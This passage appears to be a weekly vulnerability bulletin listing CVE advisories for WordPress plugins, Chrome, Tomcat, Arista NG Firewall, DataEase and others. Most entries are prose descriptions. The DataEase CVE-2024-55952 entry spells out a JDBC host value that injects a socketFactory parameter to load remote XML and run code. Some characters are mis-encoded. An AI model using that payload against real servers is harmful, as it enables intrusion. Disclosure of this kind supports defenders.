The Full Screen Menu for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.0.7 via the Full Screen Menu Elementor Widget due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with contributor-level access and above, to extract data from private or draft posts created with Elementor that they should not have access to.
2024-12-21
4.3
CVE-2024-10797

spoki–Spoki Chat Buttons and WooCommerce Notifications
The Spoki – Chat Buttons and WooCommerce Notifications plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin’s ‘spoki_button’ shortcode in all versions up to, and including, 2.15.14 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
2024-12-20
6.4
CVE-2024-11893

spreadr–Spreadr Woocommerce
Missing Authorization vulnerability in spreadr Spreadr Woocommerce allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Spreadr Woocommerce: from n/a through 1.0.4.
2024-12-16
5.3
CVE-2024-56009

taeggie–Taeggie Feed
The Taeggie Feed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin’s ‘taeggie-feed’ shortcode in all versions up to, and including, 0.1.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
2024-12-18
6.4
CVE-2024-11748

theafricanboss–SMS for WooCommerce
The SMS for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.8.1. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
2024-12-17
6.1
CVE-2024-12220

ThemeFusion–Avada
Cross-Site Request Forgery (CSRF) vulnerability in ThemeFusion Avada.This issue affects Avada: from n/a through 7.11.10.
2024-12-16
4.3
CVE-2024-54357

ticketsource–Sell Tickets Online TicketSource Ticket Shop
The Sell Tickets Online – TicketSource Ticket Shop for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin’s ‘ticketshop’ shortcode in all versions up to, and including, 3.0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
2024-12-20
6.4
CVE-2024-11784

tomroyal–Stop Registration Spam
The Stop Registration Spam plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.23. This is due to missing or incorrect nonce validation. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
2024-12-17
6.1
CVE-2024-12219

TreasureHuntGame–TreasureHunt
A vulnerability, which was classified as critical, was found in TreasureHuntGame TreasureHunt up to 963e0e0. Affected is an unknown function of the file TreasureHunt/acesso.php. The manipulation of the argument usuario leads to sql injection. It is possible to launch the attack remotely. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The name of the patch is 8bcc649abc35b7734951be084bb522a532faac4e. It is recommended to apply a patch to fix this issue.
2024-12-22
6.3
CVE-2024-12894

TreasureHuntGame–TreasureHunt
A vulnerability has been found in TreasureHuntGame TreasureHunt up to 963e0e0 and classified as critical. Affected by this vulnerability is the function console_log of the file TreasureHunt/checkflag.php. The manipulation of the argument problema leads to sql injection. The attack can be launched remotely. The identifier of the patch is 8bcc649abc35b7734951be084bb522a532faac4e. It is recommended to apply a patch to fix this issue.
2024-12-22
6.3
CVE-2024-12895

Trellix–DLP Extension
A Hardcoded Cryptographic key vulnerability existed in DLP Extension 11.11.1.3 which allowed the decryption of previously encrypted user credentials.
2024-12-16
5.3
CVE-2024-9679

Trellix–DLP Extension
An SQL Injection vulnerability existed in DLP Extension 11.11.1.3. The vulnerability allowed an attacker to perform arbitrary SQL queries potentially leading to command execution.
2024-12-16
4.9
CVE-2024-9678

Trellix–ePO Onprem Sp1 Update4
Cross-site scripting vulnerability in Trellix ePolicy Orchestrator prior to ePO 5.10 Service Pack 1 Update 3 allows a remote authenticated attacker to craft requests causing arbitrary content to be injected into the response when accessing the epolicy Orchestrator.
2024-12-20
5.4
CVE-2024-5955

tugbucket–Multi-column Tag Map
The Multi-column Tag Map plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin’s mctagmap shortcode in all versions up to, and including, 17.0.33 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
2024-12-21
6.4
CVE-2024-11196

tymotey–Easy Waveform Player
The Easy Waveform Player plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin’s ‘easywaveformplayer’ shortcode in all versions up to, and including, 1.2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
2024-12-18
6.4
CVE-2024-11881

Unknown–Cost Calculator Builder
The Cost Calculator Builder WordPress plugin before 3.2.43 does not have CSRF checks in some AJAX actions, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks.
2024-12-18
5.4
CVE-2024-10892

Unknown–Download Manager
The Download Manager WordPress plugin before 3.3.03 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).
2024-12-20
4.8
CVE-2024-10706

Unknown–Serious Slider
The Serious Slider WordPress plugin before 1.2.7 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.
2024-12-20
5.4
CVE-2024-11108

Unknown–The Events Calendar
The Events Calendar WordPress plugin before 6.8.2.1 is missing access checks in the REST API, allowing for unauthenticated users to access information about password protected events.
2024-12-16
5.3
CVE-2024-5333

Unknown–Tithe.ly Giving Button
The Tithe.ly Giving Button WordPress plugin through 1.1 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.
2024-12-16
5.4
CVE-2024-11841

Unknown–WordPress Button Plugin MaxButtons
The WordPress Button Plugin MaxButtons WordPress plugin before 9.8.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).
2024-12-20
4.8
CVE-2024-10555

van-abel–LaTeX2HTML
The LaTeX2HTML plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘ver’ or ‘date’ parameter in all versions up to, and including, 2.5.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
2024-12-21
6.1
CVE-2024-11688

vCita.com–Online Booking & Scheduling Calendar for WordPress by vcita
Cross-Site Request Forgery (CSRF) vulnerability in vCita.com Online Booking & Scheduling Calendar for WordPress by vcita allows Cross Site Request Forgery.This issue affects Online Booking & Scheduling Calendar for WordPress by vcita: from n/a through 4.5.
2024-12-16
5.4
CVE-2024-54356

videowhisper–Video Share VOD Turnkey Video Site Builder Script
The Video Share VOD – Turnkey Video Site Builder Script plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin’s ‘videowhisper_player_html’ shortcode in all versions up to, and including, 2.6.30 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
2024-12-18
6.4
CVE-2024-12449

vivo–Alarm clock
Some parameters of the alarm clock module are improperly stored, leaking some sensitive information.
2024-12-17
5.5
CVE-2021-26281

vivo–Weather
Some parameters of the weather module are improperly stored, leaking some sensitive information.
2024-12-17
5.9
CVE-2021-26279

vivo–Wifi
When using special mode to connect to enterprise wifi, certain options are not properly configured and attackers can pretend to be enterprise wifi through a carefully constructed wifi with the same name, which can lead to man-in-the-middle attacks.
2024-12-17
6.4
CVE-2020-12484

vivo–Wifi
The wifi module exposes the interface and has improper permission control, leaking sensitive information about the device.
2024-12-17
6.3
CVE-2021-26278

wbolt–MagicPost WordPress
The MagicPost plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin’s wb_share_social shortcode in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
2024-12-21
6.4
CVE-2024-12591

wealcoder–Animation Addons for Elementor
The Animation Addons for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.1.6 via the ‘render’ function in widgets/content-slider.php and widgets/tabs.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft Elementor template data.
2024-12-18
4.3
CVE-2024-12340

Web Chunky–Order Delivery & Pickup Location Date Time
Missing Authorization vulnerability in Web Chunky Order Delivery & Pickup Location Date Time allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Order Delivery & Pickup Location Date Time: from n/a through 1.1.0.
2024-12-18
6.5
CVE-2024-55997

wedevs–WP Project Manager Task, team, and project management plugin featuring kanban board and gantt charts
The WP Project Manager plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.6.15 via the Project Task List (‘/wp-json/pm/v2/projects/1/task-lists’) REST API endpoint. This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract sensitive data including the hashed passwords of project owners (e.g. adminstrators).
2024-12-19
6.5
CVE-2024-10548

withastro–astro
Astro is a web framework for content-driven websites. In affected versions a bug in Astro’s CSRF-protection middleware allows requests to bypass CSRF checks. When the `security.checkOrigin` configuration option is set to `true`, Astro middleware will perform a CSRF check. However, a vulnerability exists that can bypass this security. A semicolon-delimited parameter is allowed after the type in `Content-Type`. Web browsers will treat a `Content-Type` such as `application/x-www-form-urlencoded; abc` as a `simple request` and will not perform preflight validation. In this case, CSRF is not blocked as expected. Additionally, the `Content-Type` header is not required for a request. This issue has been addressed in version 4.16.17 and all users are advised to upgrade. There are no known workarounds for this vulnerability.
2024-12-18
5.9
CVE-2024-56140

WPENGINE, INC.–Advanced Custom Fields PRO
Cross-Site Request Forgery (CSRF) vulnerability in WPENGINE, INC. Advanced Custom Fields PRO.This issue affects Advanced Custom Fields PRO: from n/a before 6.3.2.
2024-12-16
4.3
CVE-2024-37251

wpseahorse–WP on AWS
The WP on AWS plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via $_POST data in all versions up to, and including, 5.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
2024-12-21
6.1
CVE-2024-12408

wpswings–One Click Upsell Funnel for WooCommerce Funnel Builder for WordPress, Create WooCommerce Upsell, Post-Purchase Upsell & Cross Sell Offers that Boost Sales & Increase Profits with Sales Funnel Builder
The One Click Upsell Funnel for WooCommerce – Funnel Builder for WordPress, Create WooCommerce Upsell, Post-Purchase Upsell & Cross Sell Offers that Boost Sales & Increase Profits with Sales Funnel Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin’s wps_wocuf_pro_yes shortcode in all versions up to, and including, 3.4.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
2024-12-21
6.4
CVE-2024-11938

yasinedr–Maintenance & Coming Soon Redirect Animation
The Maintenance & Coming Soon Redirect Animation plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ‘wploti_add_whitelisted_roles_option’, ‘wploti_remove_whitelisted_roles_option’, ‘wploti_add_whitelisted_users_option’, ‘wploti_remove_whitelisted_users_option’, and ‘wploti_uploaded_animation_save_option’ functions in all versions up to, and including, 2.1.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify certain plugin settings.
2024-12-20
4.3
CVE-2024-9503

YayCommerce–Brand
Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in YayCommerce Brand allows Stored XSS.This issue affects Brand: from n/a through 1.1.6.
2024-12-16
6.5
CVE-2024-54348

Yudiz Solutions Ltd.–WP Menu Image
Missing Authorization vulnerability in Yudiz Solutions Ltd. WP Menu Image allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Menu Image: from n/a through 2.2.
2024-12-18
6.5
CVE-2024-52485

yuryonfolio–PPWP Password Protect Pages
The PPWP – Password Protect Pages plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.9.5 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as administrator.
2024-12-17
5.3
CVE-2024-11280

zealopensource–Accept Authorize.NET Payments Using Contact Form 7
The Accept Authorize.NET Payments Using Contact Form 7 plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.2 via the cf7adn-info.php file. This makes it possible for unauthenticated attackers to extract configuration data which can be used to aid in other attacks.
2024-12-18
5.3
CVE-2024-12250

Low Vulnerabilities

PrimaryVendor — Product
Description
Published
CVSS Score
Source Info

code-projects–Hostel Management Site
A vulnerability was found in code-projects Hostel Management Site 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file room-details.php. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
2024-12-19
3.5
CVE-2024-12790

code-projects–Online Exam Mastering System
A vulnerability classified as problematic was found in code-projects Online Exam Mastering System 1.0. Affected by this vulnerability is an unknown functionality of the file /sign.php?q=account.php. The manipulation of the argument name/gender/college leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
2024-12-22
3.5
CVE-2024-12892

discourse–discourse
Discourse is an open source platform for community discussion. Moderators can see the Screened emails list in the admin dashboard, and through that can learn the email of a user. This problem is patched in the latest version of Discourse. Users unable to upgrade should remove moderator role from untrusted users.
2024-12-19
2.2
CVE-2024-52589

funnyzpc–Mee-Admin
A vulnerability classified as problematic was found in funnyzpc Mee-Admin up to 1.6. This vulnerability affects unknown code of the file /mee/login of the component Login. The manipulation of the argument username leads to observable response discrepancy. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used.
2024-12-16
3.7
CVE-2024-12663

HCL Software–BigFix Inventory
An improper handling of insufficient permissions or privileges affects HCL BigFix Inventory. An attacker having access via a read-only account can possibly change certain configuration parameters by crafting a specific REST API call.
2024-12-17
3.1
CVE-2024-42194

Huawei–HUAWEI Mate 20 Pro
There is an insufficient authentication vulnerability in some Huawei smart phone. An unauthenticated, local attacker can crafts software package to exploit this vulnerability. Due to insufficient verification, successful exploitation may impact the service. (Vulnerability ID: HWPSIRT-2019-12302) This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2020-9250.
2024-12-20
3.3
CVE-2020-9250

IBM–Security Guardium Key Lifecycle Manager
IBM Security Guardium Key Lifecycle Manager 4.1, 4.1.1, 4.2.0, and 4.2.1Â could allow a remote attacker to obtain sensitive information, caused by the failure to properly enable HTTP Strict Transport Security. An attacker could exploit this vulnerability to obtain sensitive information using man in the middle techniques.
2024-12-17
3.7
CVE-2024-49820

invoiceplane — invoiceplane
A vulnerability was found in InvoicePlane up to 1.6.1 and classified as problematic. Affected by this issue is some unknown functionality of the file /invoices/view. The manipulation leads to session expiration. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. Upgrading to version 1.6.2-beta-1 is able to address this issue. It is recommended to upgrade the affected component. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product.
2024-12-16
3.7
CVE-2024-12667

itsourcecode–Vehicle Management System
A vulnerability was found in itsourcecode Vehicle Management System 1.0 and classified as problematic. This issue affects some unknown processing of the file /billaction.php. The manipulation of the argument extra-cost leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
2024-12-19
3.5
CVE-2024-12783

n/a–Emlog Pro
A vulnerability classified as problematic was found in Emlog Pro up to 2.4.1. Affected by this vulnerability is an unknown functionality in the library /include/lib/common.php. The manipulation of the argument msg leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
2024-12-20
3.5
CVE-2024-12845

Portabilis–i-Educar
A vulnerability, which was classified as problematic, has been found in Portabilis i-Educar up to 2.9. Affected by this issue is some unknown functionality of the file /usuarios/tipos/2 of the component Tipo de UsuÃ¡rio Page. The manipulation of the argument name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
2024-12-22
2.4
CVE-2024-12893

ruifang-tech — rebuild
A vulnerability, which was classified as problematic, has been found in ruifang-tech Rebuild 3.8.5. This issue affects some unknown processing of the component Project Task Comment Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
2024-12-16
3.5
CVE-2024-12664

ruifang-tech — rebuild
A vulnerability, which was classified as problematic, was found in ruifang-tech Rebuild 3.8.5. Affected is an unknown function of the component Task Comment Attachment Upload. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
2024-12-16
3.5
CVE-2024-12665

smub–Easy Digital Downloads eCommerce Payments and Subscriptions made easy
The Easy Digital Downloads plugin for WordPress is vulnerable to Improper Authorization in versions 3.1 through 3.3.4. This is due to a lack of sufficient validation checks within the ‘verify_guest_email’ function to ensure the requesting user is the intended recipient of the purchase receipt. This makes it possible for unauthenticated attackers to bypass intended security restrictions and view the receipts of other users, which contains a link to download paid content. Successful exploitation requires knowledge of another customers email address as well as the file ID of the content they purchased.
2024-12-17
3.7
CVE-2024-9654

Severity Not Yet Assigned

PrimaryVendor — Product
Description
Published
CVSS Score
Source Info

Absolute Software–Secure Access
There is a cross-site scripting vulnerability in the management console of Absolute Secure Access prior to version 13.52. Attackers with system administrator permissions can interfere with another system administrator’s use of the management console when the second administrator logs in. Attack complexity is high, attack requirements are present, privileges required are high, user interaction required is none. The impact to confidentiality is none, the impact to availability is low, and the impact to system integrity is high.
2024-12-20
not yet calculated
CVE-2024-40875

Apache Software Foundation–Apache Tomcat
Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability in Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.1, from 10.1.0-M1 through 10.1.33, from 9.0.0.M1 through 9.0.97. The mitigation for CVE-2024-50379 was incomplete. Users running Tomcat on a case insensitive file system with the default servlet write enabled (readonly initialisation parameter set to the non-default value of false) may need additional configuration to fully mitigate CVE-2024-50379 depending on which version of Java they are using with Tomcat: – running on Java 8 or Java 11: the system propertyÂ sun.io.useCanonCaches must be explicitly set to false (it defaults to true) – running on Java 17: theÂ system property sun.io.useCanonCaches, if set, must be set to falseÂ (it defaults to false) – running on Java 21 onwards: no further configuration is requiredÂ (the system property and the problematic cache have been removed) Tomcat 11.0.3, 10.1.35 and 9.0.99 onwards will include checks thatÂ sun.io.useCanonCaches is set appropriately before allowing the default servlet to be write enabled on a case insensitive file system. Tomcat will also setÂ sun.io.useCanonCaches to false by default where it can.
2024-12-20
not yet calculated
CVE-2024-56337

Apple–GarageBand
This issue was addressed with improved validation of the process entitlement and Team ID. This issue is fixed in GarageBand 10.4.9. An app may be able to gain root privileges.
2024-12-20
not yet calculated
CVE-2023-42867

Apple–macOS
This issue was addressed through improved state management. This issue is fixed in macOS Sequoia 15.1. An attacker with physical access to a Mac may be able to view protected content from the Login Window.
2024-12-20
not yet calculated
CVE-2024-44223

Arctic Security–Arctic Hub
Server-Side Request Forgery in URL Mapper in Arctic Security’s Arctic Hub versions 3.0.1764-5.6.1877 allows an unauthenticated remote attacker to exfiltrate and modify configurations and data.
2024-12-20
not yet calculated
CVE-2024-12867

Arista–NG Firewall
Arista NG Firewall ExecManagerImpl Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Arista NG Firewall. Authentication is required to exploit this vulnerability. The specific flaw exists within the ExecManagerImpl class. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-24015.
2024-12-20
not yet calculated
CVE-2024-12829

Arista–NG Firewall
Arista NG Firewall custom_handler Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Arista NG Firewall. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the custom_handler method. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of the www-data user. Was ZDI-CAN-24019.
2024-12-20
not yet calculated
CVE-2024-12830

Arista–NG Firewall
Arista NG Firewall uvm_login Incorrect Authorization Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Arista NG Firewall. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the uvm_login module. The issue results from incorrect authorization. An attacker can leverage this to escalate privileges to resources normally protected from the user. Was ZDI-CAN-24324.
2024-12-20
not yet calculated
CVE-2024-12831

Arista–NG Firewall
Arista NG Firewall ReportEntry SQL Injection Arbitrary File Read and Write Vulnerability. This vulnerability allows remote attackers to create arbitrary files and disclose sensitive information on affected installations of Arista NG Firewall. Authentication is required to exploit this vulnerability. The specific flaw exists within the ReportEntry class. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the www-data user. Was ZDI-CAN-24325.
2024-12-20
not yet calculated
CVE-2024-12832

Checkmk GmbH–Checkmk
Incorrect permissions on the Checkmk Windows Agent’s data directory in Checkmk < 2.3.0p23, < 2.2.0p38 and <= 2.1.0p49 (EOL) allows a local attacker to read sensitive data.
2024-12-19
not yet calculated
CVE-2024-38864

craftcms–cms
Craft is a flexible, user-friendly CMS for creating custom digital experiences on the web and beyond. Users of affected versions are affected by this vulnerability if their php.ini configuration has `register_argc_argv` enabled. For these users an unspecified remote code execution vector is present. Users are advised to update to version 3.9.14, 4.13.2, or 5.5.2. Users unable to upgrade should disable `register_argc_argv` to mitigate the issue.
2024-12-18
not yet calculated
CVE-2024-56145

dataease–dataease
DataEase is an open source business analytics tool. Authenticated users can remotely execute code through the backend JDBC connection. When constructing the jdbc connection string, the parameters are not filtered. Constructing the host as ip:5432/test/?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://ip:5432/1.xml&a= can trigger the ClassPathXmlApplicationContext construction method. The vulnerability has been fixed in v1.18.27. Users are advised to upgrade. There are no known workarounds for this vulnerability.
2024-12-18
not yet calculated
CVE-2024-55952

dataease–dataease
DataEase is an open source business analytics tool. Authenticated users can read and deserialize arbitrary files through the background JDBC connection. When constructing the jdbc connection string, the parameters are not filtered. This vulnerability has been fixed in v1.18.27. Users are advised to upgrade. There are no known workarounds for this vulnerability.
2024-12-18
not yet calculated
CVE-2024-55953

DirectAdmin–DirectAdmin Evolution Skin
Ticket management system in DirectAdmin Evolution Skin is vulnerable to XSS (Cross-site Scripting), which allows a low-privileged user to inject and store malicious JavaScript code. If an admin views the ticket, the script might perform actions with their privileges, including command execution.Â This issue has been fixed inÂ version 1.668 of DirectAdmin Evolution Skin.
2024-12-20
not yet calculated
CVE-2024-10385

Elastic–Elasticsearch
An issue was discovered where improper authorization controls affected certain queries that could allow a malicious actor to circumvent Document Level Security in Elasticsearch and get access to documents that their roles would normally not allow.
2024-12-17
not yet calculated
CVE-2024-12539

golang.org/x/net–golang.org/x/net/html
An attacker can craft an input to the Parse functions that would be processed non-linearly with respect to its length, resulting in extremely slow parsing. This could cause a denial of service.
2024-12-18
not yet calculated
CVE-2024-45338

Google–Android
In dhd_prot_flowrings_pool_release of dhd_msgbuf.c, there is a possible outcof bounds write due to a missing bounds check. This could lead to localcescalation of privilege with no additional execution privileges needed. Usercinteraction is not needed for exploitation.
2024-12-18
not yet calculated
CVE-2024-47038

Google–Android
In isSlotMarkedSuccessful of BootControl.cpp, there is a possible out ofÂ bounds read due to a missing bounds check. This could lead to localÂ information disclosure with no additional execution privileges needed. UserÂ interaction is not needed for exploitation.
2024-12-18
not yet calculated
CVE-2024-47039

Google–Android
There is a possible UAF due to a logic error in the code.Â This could lead to local escalation of privilege with no additionalÂ execution privileges needed. User interaction is not needed forÂ exploitation.
2024-12-18
not yet calculated
CVE-2024-47040

Google–Chrome
Type Confusion in V8 in Google Chrome prior to 131.0.6778.204 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)
2024-12-18
not yet calculated
CVE-2024-12692

Google–Chrome
Out of bounds memory access in V8 in Google Chrome prior to 131.0.6778.204 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)
2024-12-18
not yet calculated
CVE-2024-12693

Google–Chrome
Use after free in Compositing in Google Chrome prior to 131.0.6778.204 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)
2024-12-18
not yet calculated
CVE-2024-12694

Google–Chrome
Out of bounds write in V8 in Google Chrome prior to 131.0.6778.204 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)
2024-12-18
not yet calculated
CVE-2024-12695

gqevu6bsiz–My WP Customize Admin/Frontend
Cross-site scripting vulnerability exists in My WP Customize Admin/Frontend versions prior to ver 1.24.1. If a malicious administrative user customizes the administrative page with some malicious contents, an arbitrary script may be executed on the web browser of the other users who are accessing the page.
2024-12-17
not yet calculated
CVE-2024-55864

HMS Networks–Ewon Flexy 205
A code injection vulnerability in HMS Networks Ewon Flexy 205 allows executing commands on system level on the device. This issue affects Ewon Flexy 205: through 14.8s0 (#2633).
2024-12-19
not yet calculated
CVE-2024-9154

InseeFrLab–onyxia
Onyxia is a web app that aims at being the glue between multiple open source backend technologies to provide a state of art working environment for data scientists. This critical vulnerability allows authenticated users to remotely execute code within the Onyxia-API, leading to potential consequences such as unauthorized access to other user environments and denial of service attacks. This issue has been patched in api versions 4.2.0, 3.1.1, and 2.8.2. Users are advised to upgrade. There are no known workarounds for this vulnerability.
2024-12-20
not yet calculated
CVE-2024-56333

joelbutcher–socialstream
Socialstream is a third-party package for Laravel Jetstream. It replaces the published authentication and profile scaffolding provided by Laravel Jetstream, with scaffolding that has support for Laravel Socialite. When linking a social account to an already authenticated user, the lack of a confirmation step introduces a security risk. This is exacerbated if ->stateless() is used in the Socialite configuration, bypassing state verification and making the exploit easier. Developers should ensure that users explicitly confirm account linking and avoid configurations that skip critical security checks. Socialstream v6.2 introduces a new custom route that requires a user to "Confirm" or "Deny" a request to link a social account. Users are advised to upgrade. There are no known workarounds for this vulnerability.
2024-12-20
not yet calculated
CVE-2024-56329

leonhad–pdftools
pdftools is a high level tools to convert PDF files to ePUB formats. In versions up to and including 0.5.0 maliciously crafted epub files can cause a stack overflow leading to a crash. This issue has not yet been addressed and users are advised to avoid untrusted input to their systems.
2024-12-17
not yet calculated
CVE-2024-56139

Liferay–Portal
Reflected cross-site scripting (XSS) vulnerability in Liferay Portal 7.1.0 through 7.4.3.38, and Liferay DXP 7.4 GA through update 38, 7.3 GA through update 36, 7.2 GA through fix pack 20 and 7.1 GA through fix pack 28 allows remote attackers to execute arbitrary web script or HTML via Dispatch name field
2024-12-17
not yet calculated
CVE-2024-11993

Linux–Linux
In the Linux kernel, the following vulnerability has been resolved: Bluetooth: hci_event: Align BR/EDR JUST_WORKS paring with LE This aligned BR/EDR JUST_WORKS method with LE which since 92516cd97fd4 ("Bluetooth: Always request for user confirmation for Just Works") always request user confirmation with confirm_hint set since the likes of bluetoothd have dedicated policy around JUST_WORKS method (e.g. main.conf:JustWorksRepairing). CVE: CVE-2024-8805
2024-12-17
not yet calculated
CVE-2024-53144

Matter–Matter
In Matter (aka connectedhomeip or Project CHIP) through 1.4.0.0, the WriteAcl function deletes all existing ACL entries first, and then attempts to recreate them based on user input. If input validation fails during decoding, the process stops, and no entries are restored by access-control-server.cpp, i.e., a denial of service.
2024-12-18
not yet calculated
CVE-2024-56317

Matter–Matter
In raw\TCP.cpp in Matter (aka connectedhomeip or Project CHIP) through 1.4.0.0 before 27ca6ec, there is a NULL pointer dereference in TCPBase::ProcessSingleMessage via TCP packets with zero messageSize, leading to denial of service.
2024-12-18
not yet calculated
CVE-2024-56318

Matter–Matter
In Matter (aka connectedhomeip or Project CHIP) through 1.4.0.0 before e3277eb, unlimited user label appends in a userlabel cluster can lead to a denial of service (resource exhaustion).
2024-12-18
not yet calculated
CVE-2024-56319

metabase–metabase
Metabase is an open-source data analytics platform. For new sandboxing configurations created in 1.52.0 till 1.52.2.4, sandboxed users are able to see field filter values from other sandboxed users. This is fixed in 1.52.2.5. Users on 1.52.0 or 1.52.1 or 1.5.2 should upgrade to 1.52.2.5. There are no workarounds for this issue aside from upgrading.
2024-12-16
not yet calculated
CVE-2024-55951

minio–minio
MinIO is a high-performance, S3 compatible object store, open sourced under GNU AGPLv3 license. Minio is subject to a privilege escalation in IAM import API, all users are impacted since MinIO commit `580d9db85e04f1b63cc2909af50f0ed08afa965f`. This issue has been addressed in commit `f246c9053f9603e610d98439799bdd2a6b293427` which is included in RELEASE.2024-12-13T22-19-12Z. There are no workarounds possible, all users are advised to upgrade immediately.
2024-12-16
not yet calculated
CVE-2024-55949

misskey-dev–misskey
